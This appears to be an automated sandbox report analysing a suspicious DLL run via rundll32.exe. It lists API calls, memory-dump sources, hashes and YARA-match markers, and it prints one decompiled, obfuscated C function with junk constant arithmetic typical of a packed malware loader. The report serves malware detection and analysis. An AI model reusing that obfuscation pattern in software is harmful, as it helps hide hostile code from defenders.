                          • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6ECDC455
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: SetThreadDescription$kernel32
                          • API String ID: 1646373207-1950310818
                          • Opcode ID: 59435504252971a0d9c94fe0621fce64bc5a7e84fa647e853ed57dfbe702c067
                          • Instruction ID: d01facf93826d0a712259aa86422a092dc91ec755b441841a79df141b1a55068
                          • Opcode Fuzzy Hash: 59435504252971a0d9c94fe0621fce64bc5a7e84fa647e853ed57dfbe702c067
                          • Instruction Fuzzy Hash: 56B092B2A4CD016BAE90ABF3AF1CE6A3A69AD512533424440AAA3D9100DB308008D961
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC420, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6ECDC425
                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6ECDC435
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetSystemTimePreciseAsFileTime$kernel32
                          • API String ID: 1646373207-392834919
                          • Opcode ID: 0f324b735adc3cf58be0ad04ae83b75a3bd6a26988173b3349500d9077dfcdad
                          • Instruction ID: 09e368e2d4b02315f0d97eb1a2971fa9d3fca4bc224146b4febfc0a172ee903a
                          • Opcode Fuzzy Hash: 0f324b735adc3cf58be0ad04ae83b75a3bd6a26988173b3349500d9077dfcdad
                          • Instruction Fuzzy Hash: 5FB09B7294CD01665D5057F36B0CD5A39255D5155334144406573D5105DB308004D921
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF4089, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetConsoleOutputCP.KERNEL32(FF3209D9,?,00000000,?), ref: 6ECF40EC
                            • Part of subcall function 6ECF19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECF3B22,?,00000000,-00000008), ref: 6ECF1A5F
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6ECF4347
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6ECF438F
                          • GetLastError.KERNEL32 ref: 6ECF4432
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: 28995482b5b7351712b4796411875ab75b4baf1c32000f4457737b0acf80c275
                          • Instruction ID: 23221f19634ec77e3918f5ff471832d80435612d34bf2797d5a1f6fc954f410e
                          • Opcode Fuzzy Hash: 28995482b5b7351712b4796411875ab75b4baf1c32000f4457737b0acf80c275
                          • Instruction Fuzzy Hash: 87D15675D00259DFDF41CFE8C980AADBBB5FF49304F14852AE925AB245E730A947CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECE2620, Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6ECE27B1
                          • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6ECE2803
                          • GetLastError.KERNEL32(?,?,?), ref: 6ECE280D
                          • GetLastError.KERNEL32(?,?,?), ref: 6ECE2875
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorLastWrite
                          • String ID:
                          • API String ID: 4006445483-0
                          • Opcode ID: f1e74b3092a10b81f7e8cac7d915658205105dabe2a309f1c0d369aaf33e8dd6
                          • Instruction ID: ae2ca2719ee19c97842262d35dd9c1da02b798acdc97ad46405da1e6364d274a
                          • Opcode Fuzzy Hash: f1e74b3092a10b81f7e8cac7d915658205105dabe2a309f1c0d369aaf33e8dd6
                          • Instruction Fuzzy Hash: 21616A32A187178BE72C8ED6CC7076E77A6FFC4300F048939E89587B88F675D8418292
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECECDDF, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 22ad71476f8331713735f53bdb0cb0dd722ce629f0fcf39bf9e4f9f8aa2822c9
                          • Instruction ID: fa5b9fc76a47ca5a6a26bfbadc7e4603735440a3bb9043bb63fb5ce0e42a9813
                          • Opcode Fuzzy Hash: 22ad71476f8331713735f53bdb0cb0dd722ce629f0fcf39bf9e4f9f8aa2822c9
                          • Instruction Fuzzy Hash: CE51D072A05686AFEB198FD5C851FAA7BB8FF00314F104429E8159FA94F731E850CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF06C7, Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6ECF19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECF3B22,?,00000000,-00000008), ref: 6ECF1A5F
                          • GetLastError.KERNEL32 ref: 6ECF072B
                          • __dosmaperr.LIBCMT ref: 6ECF0732
                          • GetLastError.KERNEL32(?,?,?,?), ref: 6ECF076C
                          • __dosmaperr.LIBCMT ref: 6ECF0773
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
                          • Opcode ID: 668db62d4a3ebae89e9de4798b17bc69c480200429f3119577a89f6cc9c8747c
                          • Instruction ID: 8d61f8b3d1b5aeaed72459ae4f2496ac8fd2c844c196c7883b0fbb3d961b773c
                          • Opcode Fuzzy Hash: 668db62d4a3ebae89e9de4798b17bc69c480200429f3119577a89f6cc9c8747c
                          • Instruction Fuzzy Hash: 4321F531A04205EFDB909FE69881C9BB7FDFF017A8710495AE81887204F731EC428B90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF57E6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6ECF5197,?,00000001,?,?,?,6ECF4486,?,?,00000000), ref: 6ECF57FD
                          • GetLastError.KERNEL32(?,6ECF5197,?,00000001,?,?,?,6ECF4486,?,?,00000000,?,?,?,6ECF4A0D,?), ref: 6ECF5809
                            • Part of subcall function 6ECF57CF: CloseHandle.KERNEL32(FFFFFFFE,6ECF5819,?,6ECF5197,?,00000001,?,?,?,6ECF4486,?,?,00000000,?,?), ref: 6ECF57DF
                          • ___initconout.LIBCMT ref: 6ECF5819
                            • Part of subcall function 6ECF5791: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6ECF57C0,6ECF5184,?,?,6ECF4486,?,?,00000000,?), ref: 6ECF57A4
                          • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6ECF5197,?,00000001,?,?,?,6ECF4486,?,?,00000000,?), ref: 6ECF582E
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                          • String ID:
                          • API String ID: 2744216297-0
                          • Opcode ID: b2ab94f78fc0a97eee52a6532f167f3036c2898ba4fce85d8b83427a836a60ff
                          • Instruction ID: 92d58dbd7a70651b2bab0c56b9930500e0ddc016254bf986d1c9a67e4e1e5307
                          • Opcode Fuzzy Hash: b2ab94f78fc0a97eee52a6532f167f3036c2898ba4fce85d8b83427a836a60ff
                          • Instruction Fuzzy Hash: 89F0F837510615FBCFA21FD69C08D893F36FF0A6A0B108011FF1985124EA328861EB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECED3E0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON
                          Download Yara Rule
                          APIs
                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6ECED405
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EncodePointer
                          • String ID: MOC$RCC
                          • API String ID: 2118026453-2084237596
                          • Opcode ID: 8b1fc241b540ea065cc130ae591653c5fcec727dac7c774bb919e15adc43516d
                          • Instruction ID: 6848b76f2e7bb197df7fa6323d22784d649d36793b7e8532d950675e045360e0
                          • Opcode Fuzzy Hash: 8b1fc241b540ea065cc130ae591653c5fcec727dac7c774bb919e15adc43516d
                          • Instruction Fuzzy Hash: 5941897290024AAFCF02CFE4C981EEE7FB5BF88308F148059F91566628E331A951DF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: rundll32.exe PID: 6316 Parent PID: 6404 rundll32.exeCOMMON

                          Executed Functions

                          Function 6ECE9990, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394filememoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileA.KERNEL32(asd,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ECE9B65
                          • GetLastError.KERNEL32 ref: 6ECE9B6B
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 6ECE9B87
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocCreateErrorFileLastVirtual
                          • String ID: asd
                          • API String ID: 1112224254-4170839921
                          • Opcode ID: e1a69a4efb5faa39d244f040b76a6d0727b2c6daa4d3f19fd9f4538f6ba13e80
                          • Instruction ID: 06a5c8b6e1ad33d812d2f40eb9f9a2a4835d4d710d012f3cd9840b51a311d08b
                          • Opcode Fuzzy Hash: e1a69a4efb5faa39d244f040b76a6d0727b2c6daa4d3f19fd9f4538f6ba13e80
                          • Instruction Fuzzy Hash: 76E11072A083168FCB50CF99C880B6AB7F1FF88714F1445ACE8599B74AE371E955CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEA21B, Relevance: 10.6, APIs: 7, Instructions: 136COMMON
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6ECEA262
                          • ___scrt_uninitialize_crt.LIBCMT ref: 6ECEA27C
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: 3833e96bf5a728211de00ae9e62e98cb1dc4b3f69f75b8aa3b5a5b96195dc364
                          • Instruction ID: 872d47036241cfabb77b1722cd51ccf7633bf0d916fdead0fde69d576a69f1f7
                          • Opcode Fuzzy Hash: 3833e96bf5a728211de00ae9e62e98cb1dc4b3f69f75b8aa3b5a5b96195dc364
                          • Instruction Fuzzy Hash: 1141C172E04615EFDB118FD9C900BEE3AB9EFC1794F114919E81567B44E7718D428BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEA2CB, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: cf7f7f4e4bfcde04ef42625a18b5b11a7d6fcd91abf32705ebafedcc8cb61933
                          • Instruction ID: 508dd27088c6dacb25ddc2774f5f57e5432dea86ba84956806e42f1768606531
                          • Opcode Fuzzy Hash: cf7f7f4e4bfcde04ef42625a18b5b11a7d6fcd91abf32705ebafedcc8cb61933
                          • Instruction Fuzzy Hash: AE214C72D00619AFDB618ED5C840AAF3A7AEFC1B94B018515FC2567B18E331CD518BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC4E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6ECDC4E5
                          • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 6ECDC4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WaitOnAddress$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1891578837
                          • Opcode ID: 5f541032547465345c2709c234cc3e0496ef1f5dd6bbf2c39b88925df1b38d12
                          • Instruction ID: c0bbf1dee56fa61bfeb6ba92dfe51bc4ad8f3b1ad3091e9dfa4500cf84b41705
                          • Opcode Fuzzy Hash: 5f541032547465345c2709c234cc3e0496ef1f5dd6bbf2c39b88925df1b38d12
                          • Instruction Fuzzy Hash: 43B092B2E08D82669EA16BF36F0CE663978AD5121B34284906923E9184DB30C108DD21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC460, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0), ref: 6ECDC465
                          • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 6ECDC475
                          Strings
                          • WakeByAddressSingle, xrefs: 6ECDC46F
                          • api-ms-win-core-synch-l1-2-0, xrefs: 6ECDC460
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                          • API String ID: 1646373207-1731903895
                          • Opcode ID: 447fcd1ee9fbe86bbfeb57c01017580702c215440c770d51308a145ebeaa2541
                          • Instruction ID: d016a2dfb48bcae3e017dd562599f9eaa30b5d0273cf097f5cd4a3c188d5819a
                          • Opcode Fuzzy Hash: 447fcd1ee9fbe86bbfeb57c01017580702c215440c770d51308a145ebeaa2541
                          • Instruction Fuzzy Hash: D6B092B2A08D81669E907BF26F0CE662938AD8221734244906663D91C1DB348108DD21
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECD1290, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 136memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE97D6
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE97F4
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE980D
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE980F
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE9816
                            • Part of subcall function 6ECE97A0: GetTickCount64.KERNEL32 ref: 6ECE9834
                          • GetProcessHeap.KERNEL32 ref: 6ECD1337
                          • HeapAlloc.KERNEL32(00760000,00000000,00023000), ref: 6ECD1351
                          • HeapFree.KERNEL32(00000000,?), ref: 6ECD1435
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick$Heap$AllocFreeProcess
                          • String ID: '`Ly
                          • API String ID: 2047189075-560155178
                          • Opcode ID: fc48c8a0b0143ad4c7592a39922905e85ffb15ff5135e5b733002f4246bfdf29
                          • Instruction ID: 46bd565e49150a0159434280e23e0f7894e69af22895f1fa4e2730b98cabe18d
                          • Opcode Fuzzy Hash: fc48c8a0b0143ad4c7592a39922905e85ffb15ff5135e5b733002f4246bfdf29
                          • Instruction Fuzzy Hash: A2518871A00B408FD3258F69D880B56BBF5FF48318F108A2DE9968BB55E735F509CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF1AA1, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 6ECF1AA9
                            • Part of subcall function 6ECF19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6ECF3B22,?,00000000,-00000008), ref: 6ECF1A5F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ECF1AE1
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6ECF1B01
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: db3a87d8eabc891ae83f6f3fde56ee6d86dc2ae458ea9c3921ac6a38cb1590a1
                          • Instruction ID: 5028f68be0ec6b43847977a3e52524faecda03b7de6f4503d41140260b107d36
                          • Opcode Fuzzy Hash: db3a87d8eabc891ae83f6f3fde56ee6d86dc2ae458ea9c3921ac6a38cb1590a1
                          • Instruction Fuzzy Hash: 0E1126F2501949FF6B8157FB5D89CAF697CDE462987204926F402D2102FB70CF0741B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECEA114, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6ECEA161
                            • Part of subcall function 6ECEA7ED: InitializeSListHead.KERNEL32(6ED2B140,6ECEA16B,6ED27D60,00000010,6ECEA0FC,?,?,?,6ECEA324,?,00000001,?,?,00000001,?,6ED27DA8), ref: 6ECEA7F2
                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6ECEA1CB
                          Memory Dump Source
                          • Source File: 00000005.00000002.534606428.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000005.00000002.534597932.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534630611.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534652602.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534659550.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000005.00000002.534665340.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                          • String ID:
                          • API String ID: 3231365870-0
                          • Opcode ID: b2493987e26fe8b79ab1ca9146eaacc7c90a83720bfe7eac57c999017457f7d2
                          • Instruction ID: c24aa0d8c5cb8675182720a5eea8ac3cf81b667545dfc4ff6d2a6724ae77fcc9
                          • Opcode Fuzzy Hash: b2493987e26fe8b79ab1ca9146eaacc7c90a83720bfe7eac57c999017457f7d2
                          • Instruction Fuzzy Hash: 08213632648381DEEF91ABF49504BDC37B59F8636CF108C19E4652BAC1FB720442C6A6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0088021F, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E0088021F(void* __ecx, void* __edx, long _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t35;
				void* _t43;
				signed int _t45;
				void* _t50;

				_push(_a16);
				_t50 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0086358A(_t35);
				_v12 = 0xc0e5f1;
				_v12 = _v12 + 0xda00;
				_v12 = _v12 ^ 0x48d5c3e6;
				_v12 = _v12 ^ 0x481bdc7d;
				_v8 = 0x17bc7;
				_v8 = _v8 >> 0xb;
				_t45 = 0x7b;
				_v8 = _v8 / _t45;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x0006db1e;
				_v16 = 0xca237e;
				_v16 = _v16 + 0xef11;
				_v16 = _v16 ^ 0x00ccab0e;
				E00870A93(0x8caed929, 0x317, _t45, _t45, 0x97da6f6d);
				_t43 = RtlAllocateHeap(_t50, _a8, _a4); // executed
				return _t43;
			}










                          0x00880226
                          0x00880229
                          0x0088022b
                          0x0088022e
                          0x00880231
                          0x00880235
                          0x00880236
                          0x0088023b
                          0x00880245
                          0x0088024e
                          0x00880255
                          0x0088025c
                          0x00880263
                          0x0088026c
                          0x00880274
                          0x00880277
                          0x0088027b
                          0x00880282
                          0x00880289
                          0x00880290
                          0x008802ac
                          0x008802bb
                          0x008802c1

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00CCAB0E,481BDC7D,?,?,?,?,?,?,?,?,?,00000008), ref: 008802BB
                          Memory Dump Source
                          • Source File: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, Offset: 00860000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 5ba53a84485e4440559d0fb43da91978a7bcc9bb3a354e9c732d1687a8d7d57f
                          • Instruction ID: 04e399edb757ce60e4649c31abd3e3149f46d2ac9e123d21dc1a2689876fbeb8
                          • Opcode Fuzzy Hash: 5ba53a84485e4440559d0fb43da91978a7bcc9bb3a354e9c732d1687a8d7d57f
                          • Instruction Fuzzy Hash: 6111F2B6D01208FBDF05DF98C94A89EBBB5EB04314F108089F915AA250E3B59B249F91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECF0566, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                          Download Yara Rule
                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,6ECF017F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6ECEA44C,?,?,6ECE99B4), ref: 6ECF05A7
                          Memory Dump Source
